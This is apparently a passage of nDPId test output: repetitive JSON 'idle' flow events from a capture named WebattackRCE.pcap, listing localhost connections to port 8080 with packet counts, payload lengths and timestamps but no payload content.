+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 